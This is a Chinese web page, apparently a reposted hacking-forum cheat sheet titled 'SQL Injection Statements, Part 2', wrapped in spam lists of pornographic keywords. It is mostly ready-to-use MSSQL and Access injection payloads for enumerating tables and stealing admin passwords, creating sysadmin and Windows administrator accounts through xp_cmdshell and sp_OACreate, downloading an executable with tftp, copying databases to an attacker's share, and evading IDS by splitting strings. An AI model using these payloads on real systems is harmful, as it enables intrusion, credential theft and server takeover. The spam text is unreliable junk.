久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品

合作QQ:25496334 TG@heimao_wiki
當前位置:首頁 >> 網站漏洞 >> SQL注入 >> SQL注入語句 下

SQL注入語句 下

yupang SQL注入 744

sql注入語句 上 http://www.790079.com/2021/12/56162/


and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一個表 假設為 admin 
 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin
')) 來得到其他的表。
 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'and uid>(st
r(id))) 暴到 UID 的數值假設為 18779569 uid=id 
 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個 admin 的一個字
段,假設為 user_id 
 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in('id
',...)) 來暴出其他的字段
 and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用戶名
 依次可以得到密碼。。。。。假設存在 user_id username ,password 等字段
 Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 
 Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin 
 (union 語句到處風靡啊,access 也好用
暴庫特殊技巧::%5c='/' 或者把/和/ 修改%5 提交
 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address
')) 
 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(s
tr(id))) 判斷 id 值
 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1 
 ;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) e
xec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM/CurrentControlSet/Services/
W3SVC/Parameters/Virtual Roots/', @value_name='/', values=@test OUTPUT insert into paths(path) 
values(@test) 
http://61.131.96.39/PageShow.asp?TianName=政策法規&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E
08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp
_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
 得到了 web 路徑 d:/xxxx,接下來:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
傳統的存在 xp_cmdshell 的測試過程:
 ;exec master..xp_cmdshell 'dir' 
 ;exec master.dbo.sp_addlogin hax;--
 ;exec master.dbo.sp_password null,hax,hax;--
 ;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
 ;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes
 /passwordreq:yes /active:yes /add';--
 ;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
 exec master..xp_servicecontrol 'start', 'schedule' 
 exec master..xp_servicecontrol 'start', 'server' 
 http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',
@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user swap 
5258 /add' 
 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,
'run',null, 'C:/WINNT/system32/cmd.exe /c net localgroup administrators swap/add' 
http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-
 declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/' 
 declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/' 
 ;declare @a;set @a=db_name();backup database @a to disk='你的 IP 你的共享目錄 bak.dat' 
 如果被限制則可以。
 select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_add
login hax') 
 傳統查詢構造:
 select * FROM news where id=... AND topic=... AND ..... 
 admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,0
1),1)='1') and userpass <>' 
 select 123;--
 ;use master;--
 :a' or name like 'fff%';-- 顯示有一個叫 ffff 的用戶哈。
 'and 1<>(select count(email) from [user]);--
 ;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) 
where name='ffff';--
說明:
 上面的語句是得到數據庫中的第一個用戶表,并把表名放在 ffff 用戶的郵箱字段中。
 通過查看 ffff 的用戶資料可得第一個用表叫 ad 
 然后根據表名 ad 得到這個表的 ID 
 ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='a
d') where name='ffff';--
 象下面這樣就可以得到第二個表的名字了
 ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>58
1577110) where name='ffff';--< 
BR> ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';
--
 ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff
';--
 ffff';update [users] set email=(select top 1 name from password where id=2) where name='fff
f';--
 exec master..xp_servicecontrol 'start', 'schedule' 
 exec master..xp_servicecontrol 'start', 'server' 
 sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll' 
 擴展存儲就可以通過一般的方法調用:
 exec xp_webserver 
 一旦這個擴展存儲執行過,可以這樣刪除它: 
 sp_dropextendedproc 'xp_webserver' 
 insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char
(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-
 insert into users values( 667,123,123,0xffff)-
 insert into users values ( 123, 'admin''--', 'password', 0xffff)-
 ;and user>0 
 ;;and (select count(*) from sysobjects)>0 
 ;;and (select count(*) from mysysobjects)>0 //為 access 數據庫
 -----------------------------------------------------------通常注射的一些介紹:
 A) ID=49 這類注入的參數是數字型,SQL 語句原貌大致如下:
 select * from 表名 where 字段=49 
 注入的參數為 ID=49 And [查詢條件],即是生成語句:
 select * from 表名 where 字段=49 And [查詢條件]
 (B) Class=連續劇 這類注入的參數是字符型,SQL 語句原貌大致概如下:
 select * from 表名 where 字段='連續劇' 
 注入的參數為 Class=連續劇' and [查詢條件] and ''=' ,即是生成語句:
 select * from 表名 where 字段='連續劇' and [查詢條件] and ''='' 
 (C) 搜索時沒過濾參數的,如 keyword=關鍵字,SQL 語句原貌大致如下:
 select * from 表名 where 字段 like '%關鍵字%' 
 注入的參數為 keyword=' and [查詢條件] and '%25'=', 即是生成語句:
 select * from 表名 where 字段 like '%' and [查詢條件] and '%'='%' 
 ;;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0 
 sysobjects 是 SQLServer 的系統表,存儲著所有的表名、視圖、約束及其它對象,xtype='U' and status>0,
表示用戶建立的表名,上面的語句將第一個表名取出,與 0 比較大小,讓報錯信息把表名暴露出來。
 ;;and (select Top 1 col_name(object_id('表名'),1) from sysobjects)>0 
 從⑤拿到表名后,用 object_id('表名')獲取表名對應的內部 ID,col_name(表名 ID,1)代表該表的第 1 個字段
名,將 1 換成 2,3,4...就可以逐個獲取所猜解表里面的字段名。
 post.htm 內容:主要是方便輸入。
 枚舉出他的數據表名:
 id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>
0);--
 這是將第一個表名更新到 aaa 的字段處。
 讀出第一個表,第二個表可以這樣讀出來(在條件后加上 and name<>'剛才得到的表名')。
 id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 
and name<>'vote');--
 然后 id=1552 and exists(select * from aaa where aaa>5) 
 讀出第二
表,^^^^^^一個個的讀出,直到沒有為止。
 讀字段是這樣:
 id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
 然后 id=1552 and exists(select * from aaa where aaa>5)出錯,得到字段名
 id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
 然后 id=1552 and exists(select * from aaa where aaa>5)出錯,得到字段名
 --------------------------------高級技巧:
 [獲得數據表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]
  update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and nam
e<>'你得到的表名' 查出一個加一個]) [ where 條件] 
 select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','tabl
e2',…) 
 通過 SQLSERVER 注入漏洞建數據庫管理員帳號和系統管理員帳號[當前帳號必須是 SYSADMIN 組] 
 [獲得數據表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名] 
 update 表名 set 字段=(select top 1 col_name(object_id('要查詢的數據表名'),字段列如:1) [ where 
條件] 
 繞過 IDS 的檢測[使用變量] 
 declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/' 
 declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/' 
 1、 開啟遠程數據庫
 基本語法
 select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * f
rom table1' ) 
 參數: (1) OLEDB Provider name


協助本站SEO優化一下,謝謝!
關鍵詞不能為空

免責聲明

資料匯總于網絡,如有侵權 聯系站長刪除 http://www.790079.com

同類推薦

發表評論

訪客

◎歡迎參與討論,請在這里發表您的看法和觀點。
久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品
久久久在线观看| 国产精品二区二区三区| 日韩一二区视频| 亚洲精品国产系列| 亚洲国产另类久久久精品极度 | 国产精品免费看一区二区三区 | 热re99久久精品国99热蜜月| 亚洲黄色网址在线观看| 亚洲欧美日韩综合一区| 亚洲va韩国va欧美va精四季| 亚洲免费在线精品一区| 亚洲精品一区二区三区av| 久久国产精品久久国产精品| 一区二区三区四区免费观看| 亚洲蜜桃在线| 日韩亚洲一区在线播放| 欧美在线免费观看| 国内一区在线| 豆国产97在线| 久久人人爽人人爽人人av | 日本手机在线视频| 日韩美女视频中文字幕| 欧美第一黄网| 国产伦精品一区| 99热久久这里只有精品| 91精品国产99| 爽爽爽爽爽爽爽成人免费观看| 久久精品视频亚洲| 欧美成人在线网站| 亚洲欧洲三级| 欧美日韩国产综合视频在线| 国产亚洲综合视频| 131美女爱做视频| 国产成人精品网站| 久久99精品久久久久久琪琪| 亚洲mm色国产网站| 热久久免费视频精品| 国产一级做a爰片久久毛片男| 91高清视频免费| 日韩视频精品在线| 久久99久久99精品中文字幕| 日韩最新中文字幕| 国产一区二区三区黄| 国产成人高潮免费观看精品| 国产精品传媒毛片三区| 欧美一级片中文字幕| 黄色激情在线视频| 久久久免费观看| 精品久久中出| 日韩国产小视频| 91免费看片网站| 国产精品都在这里| 日本一区二区久久精品| 国产乱码精品一区二区三区卡 | 国产精品成人一区二区| 欧美一区二区三区四区在线| 国模精品视频一区二区三区| 久久青草精品视频免费观看| 精品久久久久久一区| 欧美影院在线播放| 91成人精品网站| 欧美精品成人在线| 欧美有码在线观看| 97久久久久久| 精品久久久久久久免费人妻| 日韩精品一区在线视频| 99热在线国产| 精品国产第一页| 女女同性女同一区二区三区91| 久久亚洲综合网| 在线观看一区二区三区三州| 国产一区二区三区高清视频| 国产精品欧美一区二区| 欧美在线免费观看| www.xxxx精品| 日韩精品在线视频免费观看| 久久免费视频3| 亚洲精品中文字幕在线| 国产欧美在线一区| 欧美精品一区在线播放| 国产在线资源一区| 国产精品久久久久久av福利软件 | 久久精品第九区免费观看| 亚洲欧美日韩综合一区| 国产欧美精品久久久| 国产精品电影网| 国产亚洲精品久久久久久久| 国产精品久久久久久久久久尿 | 91麻豆精品秘密入口| 欧美激情视频网| 国产美女主播一区| 中文字幕欧美日韩一区二区| 丰满人妻中伦妇伦精品app| 国产99在线播放| 国产麻豆电影在线观看| 欧美成年人网站| 蜜臀av.com| 久久夜色精品国产亚洲aⅴ| 国产原创精品| 中文精品视频一区二区在线观看 | 国产精品视频一区二区三区四| 日韩国产一区久久| 久久精品成人欧美大片古装| 免费毛片一区二区三区久久久| 国产精品国产对白熟妇| 国产呦系列欧美呦日韩呦| 久久国产精品久久久| www.日日操| 日韩福利二区| 色偷偷噜噜噜亚洲男人的天堂| 欧美亚洲国产成人精品| 国产精品国产亚洲精品看不卡| 国产日韩在线看片| 亚洲一区二区三区免费看| 国产高清www| 免费高清一区二区三区| 夜夜爽www精品| 久久99国产精品99久久| 激情五月开心婷婷| 国产av第一区| 久久国产精品精品国产色婷婷| 欧美精彩一区二区三区| 欧美激情精品久久久久久大尺度| 91精品国产99久久久久久| 日韩伦理一区二区三区av在线| 国产精品视频网址| 国产精品一区电影| 日韩av片免费在线观看| 久久综合色影院| 久久久一二三四| 国模视频一区二区| 午夜精品理论片| 国产精品欧美日韩| 91免费欧美精品| 狠狠爱一区二区三区| 亚洲最大福利视频| 久久精品色欧美aⅴ一区二区| 成人免费在线网址| 欧美久久综合性欧美| 欧美激情视频给我| 精品国产视频在线| 99在线观看| 黄色国产一级视频| 日韩中文字幕免费在线| 国产精品大全| 国产a级片免费观看| 国产伦精品免费视频| 欧美日韩电影一区二区| 宅男在线精品国产免费观看| 精品国产一区二区三区在线观看| 成人久久久久久| 加勒比海盗1在线观看免费国语版 加勒比在线一区二区三区观看 | 国产精品第8页| 久久免费视频这里只有精品| 国产一区视频在线| 日本a级片电影一区二区| 一本色道久久88亚洲精品综合| 国产精品免费一区二区三区都可以 | 中文字幕精品在线播放| 久久久精品久久久| 久久资源亚洲| 蜜桃91精品入口| 人人妻人人澡人人爽欧美一区| 一本一道久久久a久久久精品91| 国产精品久久久久久久久久久新郎 | 亚洲自拍的二区三区| 精品国产乱码久久久久软件| 国产精品手机视频| 国产成人综合久久| 91九色视频在线观看| 美媛馆国产精品一区二区| 欧美一区深夜视频| 日本不卡免费新一二三区| 亚洲一区二区中文字幕| 欧美日韩福利视频| 精品综合久久久久久97| 国产精品久久不能| 精品国产一区久久久| 国产成人精品日本亚洲| 国产高清免费在线| 国产成人精品久久| 久久免费成人精品视频| 久久久一本精品99久久精品66| 爱福利视频一区二区| 高清不卡日本v二区在线| 欧美视频在线观看网站| 欧美高清中文字幕| 欧美牲交a欧美牲交aⅴ免费真| 日韩av一二三四区| 一区二区精品免费视频| 一本久道中文无码字幕av| 亚洲免费av网| 亚洲色欲久久久综合网东京热| 中文字幕一区二区三区精彩视频| 美日韩精品免费视频| 国产在线观看欧美| 国产欧美日韩伦理| 99视频在线免费播放| 久久人人看视频| 日韩日本欧美亚洲|